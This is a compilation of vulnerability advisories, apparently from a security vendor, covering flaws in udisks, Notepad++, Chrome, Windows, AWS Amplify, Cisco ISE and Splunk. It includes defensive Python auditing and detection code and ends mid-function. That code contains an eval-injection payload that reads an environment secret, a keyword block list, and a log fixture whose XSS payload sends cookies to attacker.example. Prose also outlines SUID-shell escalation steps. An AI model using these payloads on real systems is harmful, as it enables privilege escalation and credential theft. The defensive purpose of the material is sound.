Summary: A proof of concept has been released for a local privilege escalation vulnerability, tracked as CVE-2025-6019, in the libblockdev library that performs the privileged backend work for the udisksd daemon. It affects widely used Linux distributions including Fedora and SUSE.
Severity: High
CVSS Score: 7.0
CVEs: CVE-2025-6019
PoC Available: Yes
Actively Exploited: No
Exploited in Wild: No
Advisory Version: 1.0
Overview
CVE-2025-6019 is a local privilege escalation (LPE) vulnerability affecting systems where:
udisksd is installed and running (e.g., Fedora, SUSE)
polkit grants users with allow_active status (users logged in to an active local session) permission to perform disk-related actions
libblockdev, which performs the privileged backend work for udisksd, mounts user-supplied filesystems without the nosuid and nodev options
The flaw allows an unprivileged allow_active user to escalate to root by placing a setuid-root binary on a crafted filesystem and having udisksd mount it over D-Bus, crossing a trust boundary that the D-Bus IPC design was supposed to enforce.
Vulnerability Name | CVE ID | Product Affected | Severity
Local Privilege Escalation Vulnerability | CVE-2025-6019 | udisksd / libblockdev | High
Technical Summary
This vulnerability is triggered when an attacker with allow_active status sends a crafted D-Bus request to the udisksd daemon (for example through the udisksctl client). udisksd delegates the filesystem work to libblockdev, whose fs plugin mounts the attacker-supplied filesystem without the nosuid and nodev options, so the kernel honours a setuid-root binary stored on that filesystem.
An attacker can exploit this by:
Crafting a malicious disk image (e.g., an XFS filesystem containing a SUID-root shell) and attaching it to a loop device.
Triggering a privileged libblockdev filesystem operation on that device through udisksd's D-Bus interface (the example here uses udisksctl against /dev/loop0); the affected code path mounts the image as root without nosuid/nodev.
Executing the SUID shell from the mount point to obtain a root shell and compromise the system.
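The security-relevant check behind this flaw is simple: a filesystem an unprivileged user supplies must never be mounted with setuid binaries honoured. The Python script below is an added example (not code from the Qualys advisory, the udisks project or the public PoC) that audits /proc/self/mounts for loop-device and user-media mounts lacking nosuid or nodev. The sample mount table is constructed, and the list of user-reachable mount prefixes is an assumption to adjust per distribution.

```python
#!/usr/bin/env python3
"""Flag mounts that honour setuid/device nodes where an unprivileged user controls the filesystem."""
import sys

# Constructed /proc/self/mounts content for the demonstration; not captured from a real host.
SAMPLE_MOUNTS = """\
/dev/mapper/root / ext4 rw,relatime 0 0
/dev/loop0 /run/media/alice/evil xfs rw,relatime,attr2,inode64 0 0
/dev/loop1 /run/media/alice/usb0 vfat rw,nosuid,nodev,relatime 0 0
/dev/sdb1 /tmp/mnt-work xfs rw,relatime 0 0
tmpfs /run tmpfs rw,nosuid,nodev,mode=755 0 0
"""

# Mount locations where unprivileged users normally get their own media mounted
# (assumed list; extend it for your distribution's conventions).
USER_MOUNT_PREFIXES = ("/run/media/", "/media/", "/mnt/", "/tmp/")
REQUIRED_OPTS = ("nosuid", "nodev")


def parse_mounts(text):
    """Parse /proc/self/mounts lines (source target fstype options dump pass)."""
    mounts = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        source, target, fstype, opts = parts[:4]
        mounts.append({"source": source, "target": target, "fstype": fstype,
                       "options": set(opts.split(","))})
    return mounts


def is_user_controlled(source, target):
    """Loop devices and user media mount points are where an attacker supplies the filesystem."""
    return source.startswith("/dev/loop") or target.startswith(USER_MOUNT_PREFIXES)


def audit_mounts(text):
    """Return one finding per user-controlled mount that lacks nosuid and/or nodev."""
    findings = []
    for mount in parse_mounts(text):
        if not is_user_controlled(mount["source"], mount["target"]):
            continue
        missing = [opt for opt in REQUIRED_OPTS if opt not in mount["options"]]
        if missing:
            findings.append({**mount, "missing": missing})
    return findings


if __name__ == "__main__":
    # With --sample, audit the constructed table; otherwise audit the live host.
    text = SAMPLE_MOUNTS if "--sample" in sys.argv[1:] else open("/proc/self/mounts").read()
    for f in audit_mounts(text):
        print(f"{f['source']} on {f['target']} ({f['fstype']}): missing {','.join(f['missing'])}")
    print("no findings" if not audit_mounts(text) else "review the mounts above")
```

On the constructed table the audit flags the XFS image on /dev/loop0 and the XFS mount under /tmp, and accepts the USB stick mounted with nosuid,nodev; on a patched host, a udisks-driven mount of user media should produce no findings.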
CVE ID | System Affected | Vulnerability Details | Impact
CVE-2025-6019 | Fedora, SUSE and other Linux distributions using udisks2/libblockdev | libblockdev mounts attacker-supplied filesystems on behalf of udisksd without the nosuid and nodev options, so an allow_active user can execute a setuid-root binary from a crafted image. | Local privilege escalation to root
Remediation:
Update udisks2 and libblockdev to the fixed versions provided by your distribution.
Review which users can obtain polkit allow_active status (normally users logged in to an active local session) and make sure remote or service sessions are not granted it.
Tighten the polkit policy for udisks2 actions where possible, for example by requiring auth_admin instead of allow_active for org.freedesktop.udisks2.modify-device, and disable unused or legacy D-Bus actions in system services.
Conclusion: CVE-2025-6019 highlights a breakdown in privilege boundary enforcement within a core system component used by many Linux desktop environments.
The availability of a public PoC, combined with the low complexity of exploitation, makes this vulnerability highly dangerous, particularly in multi-user or shared computing environments.
Organizations must act swiftly to patch vulnerable systems, reassess which users are granted allow_active privileges, and implement stricter D-Bus and polkit rules to reduce the attack surface.
Third-party vendors are critical to any business or industry, but they also carry a significant amount of cyber risk. Qantas has confirmed a cyber attack in which the data of nearly six million customers may have been compromised. The airline issued a statement saying that credit card details, financial information and passport details were not part of the breach.
Qantas said in a statement: “We are continuing to investigate the proportion of the data that has been stolen, though we expect it will be significant. An initial review has confirmed the data includes some customers’ names, email addresses, phone numbers, birth dates and frequent flyer numbers.”
The alarming aspect of a third-party data breach is the sheer scale of impact. Hackers have the potential to attack thousands of organizations in one fell swoop.
A KPMG study found that 73% of organizations have experienced at least one significant disruption from a third-party cyber incident within the last three years.
Qantas Group chief executive Vanessa Hudson said the company was working closely with the National Cyber Security Coordinator and the Australian Cyber Security Centre.
“We sincerely apologize to our customers and we recognize the uncertainty this will cause. Our customers trust us with their personal information, and we take that responsibility seriously,” she said.
Qantas, one of the world's oldest airlines, did not attribute the breach to any hacking group. It is one of Australia's biggest breaches in years and has caused a major setback and reputational damage to the airline.
Last week, the FBI said the Scattered Spider group was targeting airlines, and that Hawaiian Airlines (HAII.UL) and Canada's WestJet had already reported breaches.
Key pointers of the Qantas breach
The attackers broke into a database containing the personal information of millions of customers.
The breach was executed by hackers who targeted a call center and gained access to a third-party customer service platform containing six million names, email addresses, phone numbers, birth dates and frequent flyer numbers.
Third-party risk management is complex, but neglecting it can be fatal for organizations that hold large volumes of data, such as airlines.
The airline is emailing affected customers and has set up a dedicated support line at 1800 971 541 (or +61 2 8028 0534 from overseas).
Looking back to 2020 and the SolarWinds attack: SolarWinds confirmed that its network had been penetrated by a malicious actor and that complex malware had been inserted into software updates of its SolarWinds Orion® platform.
Such was the magnitude of the attack that the malware operated as a multistage process, scanning downstream customer networks to detect security tools it could avoid or disable and stealthily connecting to the attacker's command-and-control servers. The malware persisted for months before initial detection.
The cost of the SolarWinds attack was significant: affected companies reported that incident response and forensic services cost them about 11% of their annual revenue (an average of $12 million).
How to make sure your vendors don't create unnecessary risk for the organization at large
First, ensure your third-party vendors meet the required robust security posture.
Vendor risk assessment must be done holistically, with streamlined due diligence.
Upon discovery of any vulnerability, customize and update security requirements to reflect the newly discovered threats and the patches for them.
As part of a better threat mitigation strategy, automate vendor onboarding; this provides agility.
Managing Third party risk with Intru360
Research by KPMG found that 61% of businesses underestimate third-party risk management and often struggle to maintain a healthy operating model and scale it at the same time.
KPMG further recommends third-party/nth-party risk management that covers all third-party relationships over the entire life cycle; subjects vendors that support critical activities, or are heavily relied upon, to more comprehensive and rigorous oversight; and considers transition, contingency, recovery and duplicity alternatives.
Since most technology investments fail to provide visibility into third-party risk, we at Intercept help you expand the scope and cover third-party risk areas by identifying them.
Intru360 gives security analysts and SOC managers a clear view across the organization, helping them fully understand the extent and context of an attack. It also simplifies workflows by automatically handling alerts, allowing for faster detection of both known and unknown threats.
For vendor security and management, here are some of the features we offer to make sure the cyber health of each supplier is checked and alerts are raised to notify you:
Prebuilt playbooks and automated response capabilities.
Over 400 third-party and cloud integrations.
More than 1,100 preconfigured correlation rules.
Ready-to-use threat analytics, threat intelligence service feeds, and prioritization based on risk.
Security Advisory: A high-severity privilege escalation vulnerability has been discovered in the Notepad++ v8.8.1 and earlier installer, which allows local attackers to gain SYSTEM-level privileges through an uncontrolled executable search path (binary planting).
The installer looks up executable dependencies by name, so the current working directory is searched for them without verification, allowing an attacker to place a malicious executable that is loaded with SYSTEM privileges during installation.
OEM: Notepad++
Severity: High
CVSS Score: 7.3
CVEs: CVE-2025-49144
PoC Available: Yes
Actively Exploited: No
Exploited in Wild: No
Advisory Version: 1.0
Overview
Exploitation requires minimal user interaction and a public Proof of Concept (PoC) is available. The issue is resolved in version v8.8.2.
Vulnerability Name | CVE ID | Product Affected | Severity | Fixed Version
Privilege Escalation Vulnerability | CVE-2025-49144 | Notepad++ | High | v8.8.2
Technical Summary
The Notepad++ installer invokes executable dependencies by name rather than by absolute path, so Windows searches the installer's own directory for them without verifying their authenticity.
This insecure behavior allows an attacker to place a malicious executable (e.g., a file named regsvr32.exe) in the same directory as the installer. When the installer runs, the planted file is executed with SYSTEM-level privileges, granting full control of the machine.
In a real-world scenario, an attacker could use social engineering to trick a user into downloading both the legitimate installer and a malicious executable into the same directory (typically the Downloads folder, a user-writable location). When the user runs the installer, the attack executes automatically with SYSTEM privileges.
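To make the search-path point concrete, the Python below is an added example (not code from the Notepad++ project or from the published PoC) that models how Windows resolves an unqualified executable name, shows why pinning the absolute System32 path removes the planting opportunity, and adds the check a defender would run over a user-writable folder: any file whose name collides with a System32 binary is a planting candidate. The filesystem layout, paths and file names are constructed assumptions; the search order is the simplified application directory, current directory, System32, Windows directory sequence.

```python
#!/usr/bin/env python3
"""Model of the unqualified executable lookup behind CVE-2025-49144, plus a planting check."""
import ntpath

# Constructed model of a Windows filesystem: directory -> files it contains.
# Paths and file names are assumptions for the demonstration, not taken from the real PoC.
SYSTEM_ROOT = r"C:\Windows"
SYSTEM32 = ntpath.join(SYSTEM_ROOT, "System32")
DOWNLOADS = r"C:\Users\alice\Downloads"
FS = {
    SYSTEM32: {"regsvr32.exe", "cmd.exe", "rundll32.exe"},
    DOWNLOADS: {"npp.installer.exe", "regsvr32.exe"},  # the second entry is the planted binary
}


def search_order(app_dir, cwd, system_root=SYSTEM_ROOT):
    """Simplified Windows search order for an unqualified executable name:
    application directory, current directory, System32, Windows directory (PATH omitted)."""
    order = []
    for directory in (app_dir, cwd, ntpath.join(system_root, "System32"), system_root):
        if directory not in order:
            order.append(directory)
    return order


def resolve_unqualified(name, app_dir, cwd, fs=FS):
    """Vulnerable behaviour: the first directory in the search order holding the name wins,
    so a file beside the installer shadows the genuine System32 binary."""
    for directory in search_order(app_dir, cwd):
        present = {f.lower() for f in fs.get(directory, ())}
        if name.lower() in present:
            return ntpath.join(directory, name)
    return None


def resolve_pinned(name, system_root=SYSTEM_ROOT):
    """Hardened behaviour (the approach the v8.8.2 fix takes): build the absolute path
    under the system root, so nothing placed next to the installer is ever considered."""
    return ntpath.join(system_root, "System32", name)


def find_planted(fs, writable_dirs, system_root=SYSTEM_ROOT):
    """Detection helper: files in user-writable directories whose names collide with
    System32 binaries are binary-planting candidates worth alerting on."""
    system_names = {f.lower() for f in fs.get(ntpath.join(system_root, "System32"), ())}
    hits = []
    for directory in writable_dirs:
        for name in sorted(fs.get(directory, ())):
            if name.lower() in system_names:
                hits.append(ntpath.join(directory, name))
    return hits


if __name__ == "__main__":
    print("unqualified lookup ->", resolve_unqualified("regsvr32.exe", DOWNLOADS, DOWNLOADS))
    print("pinned lookup      ->", resolve_pinned("regsvr32.exe"))
    print("planting candidates:", find_planted(FS, [DOWNLOADS]))
```

The model makes the two remediation lines above actionable: running installers from a clean, trusted directory empties the first two search positions, and the planting check is what an endpoint rule for the Downloads folder amounts to.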
CVE ID | System Affected | Vulnerability Details | Impact
CVE-2025-49144 | Notepad++ v8.8.1 and earlier | The installer invokes executables (e.g., regsvr32) by name rather than absolute path, allowing a malicious binary in the same directory to be executed with elevated privileges. | SYSTEM privilege escalation and full machine control
Proof of Concept (PoC):
Execution Flow: The attacker places a fake regsvr32.exe in the same directory as the Notepad++ installer.
Trigger: When the user runs the installer, it loads the attacker's file with SYSTEM privileges.
Evidence:
Process Monitor logs confirm that the installer searches for executables in its local directory.
A video demonstration confirms successful SYSTEM-level access via a reverse shell.
Public PoC materials are hosted and shared, confirming reproducibility.
Remediation:
Immediate Action: Upgrade to Notepad++ v8.8.2 or later which explicitly sets absolute paths when invoking executables like regsvr32.
Recommendations:
Configuration Check: Avoid executing installers from user-writable locations like the Downloads folder. Ensure installers are run from isolated, trusted directories.
Environment Hardening: Implement endpoint detection for binary planting, restrict execution in commonly targeted directories.
Conclusion: CVE-2025-49144 is a high-severity privilege escalation vulnerability with a working public PoC. It stems from a fundamental flaw in how the Notepad++ installer locates the executables it invokes.
Given the low barrier to exploitation and the high impact, especially in environments where Notepad++ is widely used, immediate remediation is strongly advised. Similar flaws in past versions highlight the persistent risk of insecure software packaging.
While Microsoft classifies some binary planting issues as “Defense-in-Depth,” gaining SYSTEM privileges with minimal user interaction warrants priority remediation.
A newly patched zero-day vulnerability in Google Chrome, CVE-2025-2783, was exploited in the wild by a threat actor tracked as TaxOff to deploy Trinper, an advanced backdoor.
CVE-2025-2783 is a sandbox escape vulnerability in Chrome's Mojo IPC (Inter-Process Communication) framework on Windows; it allowed attackers to bypass the browser's security sandbox and achieve remote code execution.
TaxOff Threat Actor
TaxOff is a sophisticated Advanced Persistent Threat (APT) group that primarily targets government organizations. It is known for advanced social engineering, often phishing campaigns themed around financial reporting and regulatory compliance.
The CVE-2025-2783 vulnerability was first detected in March 2025 after Kaspersky reported real-world exploitation.
TaxOff used a phishing-based delivery method, which involved embedding a malicious link in emails masquerading as invitations to legitimate events like the Primakov Readings forum.
Once the link was clicked, the CVE-2025-2783 exploit was triggered, leading to the deployment of the Trinper backdoor. It was a one-click compromise that delivered a highly tailored payload with surgical precision.
Trinper Backdoor
Trinper is a multi-threaded C++ backdoor that collects host data, logs keystrokes, exfiltrates targeted documents (Word, Excel and PDF files) and maintains remote access.
But this wasn’t just a “plug-and-play” backdoor. Trinper’s loader employed five layers of encryption, utilizing ChaCha20, modified BLAKE2b hashes, and even machine-specific environmental checks. It was decrypted only on intended systems, using unique hardware identifiers like firmware UUIDs and PEB structures.
Source: global.ptsecurity.com
Interestingly, researchers found that Team46, a different APT group, shares many TTPs with TaxOff. This overlap raises the possibility that TaxOff and Team46 are the same group operating under different aliases.
Both groups have used PowerShell-based loaders and Cobalt Strike as their primary tooling.
This flaw allows threat actors to:
Execute arbitrary code
Bypass Chrome’s built-in security sandbox
Potentially gain remote control over the system
Recommendation
The rapid exploitation of CVE-2025-2783 highlights the critical importance of timely patch management. Google released a fix for this vulnerability in March 2025, and all users are strongly advised to update their Chrome browsers to the latest version immediately.
In addition to patching, organizations should implement the following defensive measures
Enhance email filtering systems and provide regular phishing awareness training for employees.
Continuously monitor systems for unusual or suspicious behavior related to script execution or network anomalies.
Restrict the execution of unsigned or obfuscated scripts and macros, particularly from email attachments or downloaded files, using tools like AppLocker or Microsoft Defender Attack Surface Reduction (ASR) rules.
Summary : Microsoft’s June 2025 Patch Tuesday addresses a total of 67 vulnerabilities across its product ecosystem. Critical flaws in WebDAV, SMB, SharePoint and Remote Desktop Services highlight the urgency of installing this month’s updates.
OEM: Microsoft
Severity: Critical
Date of Announcement: 2025-06-10
No. of Vulnerabilities Patched: 67
Actively Exploited: Yes
Exploited in Wild: Yes
Advisory Version: 1.0
Overview
These include multiple high-risk flaws and two zero-day vulnerabilities (one actively exploited, one publicly disclosed) affecting core components such as Windows WebDAV and the SMB client.
67 Microsoft CVEs addressed
3 non-Microsoft CVEs addressed
Breakdown of June 2025 Vulnerabilities
25 Remote Code Execution (RCE)
17 Information Disclosure
14 Elevation of Privilege (EoP)
6 Denial of Service (DoS)
3 Security Feature Bypass
2 Spoofing
2 Chromium (Edge) Vulnerabilities
1 Windows Secure Boot
Vulnerability Name | CVE ID | Product Affected | Severity | CVSS Score
WebDAV Remote Code Execution (exploited in the wild) | CVE-2025-33053 | Windows | High | 8.8
SMB Client Elevation of Privilege (publicly disclosed) | CVE-2025-33073 | Windows | High | 8.8
Technical Summary
Two zero-day vulnerabilities in Microsoft’s ecosystem were addressed in June 2025. One of these, CVE-2025-33053, has been exploited in the wild and affects the deprecated but still present WebDAV component in Windows. The other, CVE-2025-33073, was publicly disclosed and affects the Windows SMB client, enabling attackers to elevate privileges.
CVE ID | System Affected | Vulnerability Details | Impact
CVE-2025-33053 | Windows 10, 11 and Windows Server | WebDAV RCE triggered when a user clicks a malicious link; exploited by the APT group “Stealth Falcon”. Exploitation complexity is low. | Remote Code Execution
CVE-2025-33073 | Windows 10, 11 and Windows Server | EoP flaw in the SMB client; exploitation may occur when the client is made to connect to a malicious SMB server. Privilege elevation to SYSTEM is possible. | Elevation of Privilege
Source: Microsoft and NVD
In addition to the zero-day vulnerabilities, several other critical and high-severity issues were addressed:
CVE-2025-47162, CVE-2025-47164, CVE-2025-47167: Microsoft Office, Preview Pane-based RCE vulnerabilities, exploitation more likely (CVSS 8.4)
CVE-2025-47172: Microsoft SharePoint Server, SQL injection-based RCE (CVSS 8.8)
CVE-2025-29828: Windows Cryptographic Services, memory release issue (CVSS 8.1)
CVE-2025-32710: Windows Remote Desktop Services, use-after-free vulnerability (CVSS 8.1)
CVE-2025-29976: Microsoft SharePoint, Local privilege escalation (CVSS 7.8)
CVE-2025-30393: Microsoft Excel, RCE via malicious Excel file (CVSS 7.8)
CVE-2025-24063: Windows Kernel, Local privilege escalation, marked “Exploitation More Likely” (CVSS 7.8)
CVE-2025-26685: Microsoft Defender for Identity, Spoofing via NTLM fallback, exploitable in adjacent networks (CVSS 6.5)
Remediation:
Apply Patches Promptly: Install the June 2025 security updates immediately to mitigate risks.
General Recommendations:
Prioritize Zero-Days: Focus on patching the two confirmed zero-day vulnerabilities, especially those allowing Elevation of Privilege and remote code execution.
Disable Deprecated Services: If not required, disable WebDAV (WebClient service) and SMBv1 to reduce exposure.
Enforce SMB Signing: Use Group Policy to mandate SMB signing, reducing the risk from CVE-2025-33073.
Monitor for Exploitation Attempts: Watch for suspicious SMB or WebDAV traffic in logs and endpoint detection systems.
Enable Auto Updates Where Feasible: For individual endpoints and less tightly controlled systems, enable automatic updates to maintain regular patch schedule.
Conclusion:
Microsoft’s June 2025 Patch Tuesday addresses two important zero-day vulnerabilities, including an actively exploited RCE in WebDAV tracked as CVE-2025-33053.
Organizations should prioritize these patches to mitigate risk from real-world threats. The CVE-2025-33053 vulnerability has also been added to CISA’s Known Exploited Vulnerabilities (KEV) catalog, emphasizing its urgency.
Summary: A critical security vulnerability has been disclosed in AWS Amplify Studio’s UI generation framework, with researchers releasing a proof-of-concept exploit demonstrating remote code execution capabilities.
OEM: AWS
Severity: Critical
CVSS Score: 9.5
CVEs: CVE-2025-4318
PoC Available: Yes
Actively Exploited: No
Exploited in Wild: No
Advisory Version: 1.0
Overview
A critical vulnerability has been discovered in AWS Amplify Studio’s UI generation tool, @aws-amplify/codegen-ui, which allows Remote Code Execution (RCE) during build or render time.
Tracked as CVE-2025-4318, this flaw originates from unsafe evaluation of user-defined JavaScript expressions without proper input validation or sandboxing.
It has been assigned a CVSS score of 9.5. Exploitation could lead to unauthorized command execution, leakage of AWS secrets, or full compromise of CI/CD environments. AWS addressed the issue in version 2.20.3, replacing the unsafe eval() with a sandboxed expression evaluator.
Vulnerability Name | CVE ID | Product Affected | Severity | Fixed Version
Unsafe Expression Evaluation in codegen-ui | CVE-2025-4318 | @aws-amplify/codegen-ui | Critical | 2.20.3
Technical Summary
The vulnerability stems from how AWS Amplify Studio processed dynamic expressions defined in component fields (e.g., label, placeholder).
In affected versions, these expressions were passed directly to eval() without any filtering or validation, on the assumption that they were safe.
This allowed attackers to inject malicious code into UI schemas that would execute during the build or at runtime, which is particularly dangerous in CI/CD pipelines where secrets and environment variables are accessible.
A working Proof-of-Concept (PoC) has been developed and shared by researchers; it simulates the exploit with a crafted JSON component, a Node.js script and a Python server, and demonstrates successful RCE via malicious input evaluated by the vulnerable tool.
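The pattern at the heart of this CVE, an expression string from a component schema handed to eval(), is language-independent, and the Python analog below is an added example (not the codegen-ui code or AWS's fix) that puts the vulnerable form, a keyword-blacklist filter and an AST allow-list evaluator side by side. The component context, the expressions and the environment "secret" are constructed; the point of the third variant is that parsing the expression and permitting only known-safe syntax nodes is what a sandboxed evaluator has to do, whereas a substring blacklist on its own is routed around by trivial string construction.

```python
#!/usr/bin/env python3
"""eval() of UI expressions versus an AST allow-list evaluator (Python analog of the Amplify flaw)."""
import ast
import operator
import os

# Constructed stand-in for a CI/CD credential reachable from the build process.
os.environ.setdefault("CODEGEN_DEMO_SECRET", "constructed-secret")

# Data a UI expression is legitimately allowed to reference (constructed component context).
CONTEXT = {"user": {"name": "Ada", "plan": "pro"}}

BENIGN_EXPR = '"Hello, " + user.name'
CONDITIONAL_EXPR = '"Premium" if user.plan == "pro" else "Free"'
# Attacker-controlled expression from a crafted component schema. It never contains the
# literal word "import", so a substring blacklist does not catch it.
LEAK_EXPR = '__builtins__["__imp" + "ort__"]("os").environ["CODEGEN_DEMO_SECRET"]'


def render_unsafe(expr, context):
    """Vulnerable pattern: the expression string goes straight to eval()."""
    return eval(expr, {}, dict(context))


BLACKLIST = ("import", "open", "exec", "eval", "subprocess")


def render_blacklisted(expr, context):
    """Blacklist filtering in front of eval(): brittle, because the payload is still evaluated."""
    if any(word in expr for word in BLACKLIST):
        raise ValueError("blocked keyword")
    return render_unsafe(expr, context)


_BIN_OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul}
_CMP_OPS = {ast.Eq: operator.eq, ast.NotEq: operator.ne, ast.Lt: operator.lt, ast.Gt: operator.gt}


def _eval_node(node, ctx):
    """Walk the AST and evaluate only the node types the component language needs."""
    if isinstance(node, ast.Constant) and isinstance(node.value, (str, int, float, bool)):
        return node.value
    if isinstance(node, ast.Name):
        if node.id not in ctx:
            raise ValueError(f"unknown name {node.id!r}")
        return ctx[node.id]
    if isinstance(node, ast.Attribute):  # dotted access on plain data only, never on objects
        obj = _eval_node(node.value, ctx)
        if not isinstance(obj, dict) or node.attr.startswith("_") or node.attr not in obj:
            raise ValueError(f"attribute {node.attr!r} not permitted")
        return obj[node.attr]
    if isinstance(node, ast.BinOp) and type(node.op) in _BIN_OPS:
        return _BIN_OPS[type(node.op)](_eval_node(node.left, ctx), _eval_node(node.right, ctx))
    if isinstance(node, ast.Compare) and len(node.ops) == 1 and type(node.ops[0]) in _CMP_OPS:
        left = _eval_node(node.left, ctx)
        right = _eval_node(node.comparators[0], ctx)
        return _CMP_OPS[type(node.ops[0])](left, right)
    if isinstance(node, ast.IfExp):
        branch = node.body if _eval_node(node.test, ctx) else node.orelse
        return _eval_node(branch, ctx)
    raise ValueError(f"disallowed syntax: {type(node).__name__}")


def render_safe(expr, context):
    """Allow-list evaluator: literals, context names, dotted access on plain data,
    arithmetic, a single comparison and a conditional expression. Calls, subscripts,
    comprehensions and everything else are rejected before anything runs."""
    tree = ast.parse(expr, mode="eval")
    return _eval_node(tree.body, context)


if __name__ == "__main__":
    print("unsafe      :", render_unsafe(LEAK_EXPR, CONTEXT))       # leaks the secret
    print("blacklisted :", render_blacklisted(LEAK_EXPR, CONTEXT))  # still leaks it
    print("safe        :", render_safe(BENIGN_EXPR, CONTEXT))       # Hello, Ada
    try:
        render_safe(LEAK_EXPR, CONTEXT)
    except ValueError as err:
        print("safe rejected:", err)
```

The same division applies when auditing existing component schemas, as the remediation suggests: anything that does not parse into the small allow-listed grammar is suspect, regardless of which keywords it contains.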
CVE ID | System Affected | Vulnerability Details | Impact
CVE-2025-4318 | @aws-amplify/codegen-ui (AWS Amplify Studio) <= 2.20.2 | Vulnerable versions used eval() to interpret stringified JavaScript expressions in UI components with no validation or filtering, so a crafted expression could execute arbitrary code, including shell commands. | RCE, exposure of secrets, CI/CD compromise, unauthorized system control
Remediation:
Upgrade Immediately: Update @aws-amplify/codegen-ui to version 2.20.3 or later, which replaces unsafe evaluation logic with a sandboxed function (safeEval) and a keyword blacklist.
Conclusion: CVE-2025-4318 is a severe RCE vulnerability in AWS Amplify Studio caused by unsafe evaluation of JavaScript expressions during UI component rendering or generation.
A fully functional PoC exploit has been published, which clearly demonstrates the risk of using eval() in dynamic application code without input validation.
The fixed version mitigates this risk by introducing a sandboxed evaluation mechanism and filtering dangerous keywords. Organizations using Amplify Studio should upgrade immediately and audit all inputs and build processes for safety.
AWS security teams have advised developers to immediately upgrade to version 2.20.3 or later and audit all existing component schemas for potentially unsafe expressions.
The incident highlights the critical importance of implementing secure coding practices in low-code development platforms where user input directly influences code generation and execution processes.
Cisco has disclosed a critical vulnerability in Identity Services Engine (ISE) cloud deployments that allows unauthenticated remote attackers to gain administrative access across multiple instances due to improperly generated static credentials.
Tracked as CVE-2025-20286, with a CVSS score of 9.9, this flaw affects ISE deployments on AWS, Microsoft Azure, and Oracle Cloud Infrastructure (OCI). Cisco has released hotfixes and announced permanent fixes for impacted versions.
Vulnerability Name | CVE ID | Product Affected | Severity
Cisco ISE Shared Credential Vulnerability | CVE-2025-20286 | Cisco ISE | Critical
Technical Summary
The vulnerability stems from improper credential generation during the setup of Cisco ISE on cloud platforms: every deployment of the same ISE release on a given platform (e.g., ISE 3.1 on AWS) shares identical static credentials. An attacker who extracts the credentials from one deployment can reuse them against any other deployment of that release on that platform, provided network access is available.
The issue only affects deployments whose Primary Administration node is cloud-hosted. Traditional on-premises deployments, and hybrid setups where the administration nodes are on-premises, are not affected.
CVE ID | System Affected | Vulnerability Details | Impact
CVE-2025-20286 | Cisco ISE 3.1 – 3.4 (cloud deployments on AWS, Azure and OCI) | Static credentials are shared by every deployment of the same ISE release on the same cloud platform; credentials extracted from one instance can be reused against others. | Unauthorized administrative access: exposure of sensitive data, configuration changes and service disruption
Remediation:
Apply Hotfix Immediately: Install the universal hotfix ise-apply-CSCwn63400_3.1.x_patchall-SPA.tar.gz on ISE versions 3.1 to 3.4.
Conclusion: CVE-2025-20286 presents a severe security risk to organizations using Cisco ISE on public cloud platforms. By exploiting shared static credentials, attackers can potentially move laterally between cloud deployments.
Although no active exploitation has been reported, a proof-of-concept (PoC) exploit is available, heightening the urgency for remediation.
Organizations should apply hotfixes immediately, upgrade to secured versions, and tighten cloud network access policies to mitigate the risk. On-premises and hybrid deployments remain unaffected, offering a safer architectural alternative.
Splunk has disclosed a medium-severity cross-site scripting (XSS) vulnerability affecting multiple versions of its Enterprise and Cloud Platform products that could allow low-privileged attackers to execute malicious JavaScript code in users’ browsers.
OEM: Cisco (Splunk)
Severity: Medium
CVSS Score: 4.3
CVEs: CVE-2025-20297
CWEs: CWE-79
Exploited in Wild: No
Advisory Version: 1.0
Overview
A security vulnerability identified as CVE-2025-20297 has been found in older versions of Splunk Enterprise and Splunk Cloud Platform.
This issue allows low privileged users to execute unauthorized JavaScript code in a victim’s browser using a specific Splunk feature that generates Pdf from dashboards.
Although the vulnerability is rated Medium (CVSS 4.3), it could pose a significant risk in environments where Splunk Web is widely accessed.
The vulnerability specifically targets instances with Splunk Web enabled, which represents the majority of production deployments given the component’s central role in dashboard management and user interface functionality.
Vulnerability Name | CVE ID | Product Affected | Severity | Fixed Version
Reflected Cross-Site Scripting | CVE-2025-20297 | Splunk Enterprise & Cloud | Medium | See the remediation section
Technical Summary
The vulnerability lies in the pdfgen/render REST endpoint used to create dashboard PDFs. In vulnerable versions, a low-privileged user (not an admin or power user) can inject a malicious script via this endpoint.
If a legitimate user follows a crafted link to this endpoint, their browser may execute the injected script in the context of their Splunk session without their consent; this is a reflected cross-site scripting (XSS) attack.
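Splunk has not published detection guidance for this issue, so the Python below is an added example (not Splunk's code) of the monitoring a SOC would put in place: scan access-log lines for requests to the pdfgen/render endpoint whose query parameters carry script markers, decoding nested percent-encoding first so a double-encoded payload is not missed. The log lines are constructed in the common-log style; the user names, addresses and parameter names are assumptions, and the parser is a generic common-log parser rather than a Splunk-specific one.

```python
#!/usr/bin/env python3
"""Flag script-injection attempts against the pdfgen/render endpoint in access logs."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines in common-log style (not real traffic). The fourth line
# carries a double-encoded payload (%253A decodes to %3A, then to ':').
SAMPLE_LOG = """\
10.0.0.5 - alice [10/Jun/2025:08:15:02.123 +0000] "GET /servicesNS/alice/search/pdfgen/render?input-dashboard=sales_overview&paper-size=a4 HTTP/1.1" 200 48213 - - - 215ms
10.0.0.5 - alice [10/Jun/2025:08:15:40.002 +0000] "GET /services/search/jobs HTTP/1.1" 200 1833 - - - 12ms
10.0.0.9 - mallory [10/Jun/2025:08:16:11.870 +0000] "GET /servicesNS/mallory/search/pdfgen/render?input-dashboard=%3Cscript%3Efetch%28%27https%3A%2F%2Fattacker.example%2F%3F%27%2Bdocument.cookie%29%3C%2Fscript%3E HTTP/1.1" 400 211 - - - 9ms
10.0.0.9 - mallory [10/Jun/2025:08:16:12.301 +0000] "GET /servicesNS/mallory/search/pdfgen/render?input-dashboard=ops&paper-orientation=javascript%253Aalert%281%29 HTTP/1.1" 200 1022 - - - 31ms
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# Markers that have no business in a dashboard-rendering request.
SUSPICIOUS = re.compile(
    r"<\s*/?\s*[a-z]|javascript\s*:|\bon[a-z]+\s*=|data\s*:\s*text/html", re.IGNORECASE
)


def parse_line(line):
    """Return the fields of one common-log line, or None if it does not match."""
    match = LINE_RE.match(line)
    return match.groupdict() if match else None


def fully_decode(value, rounds=3):
    """Undo nested percent-encoding so %253C is seen as '<' as well as %3C."""
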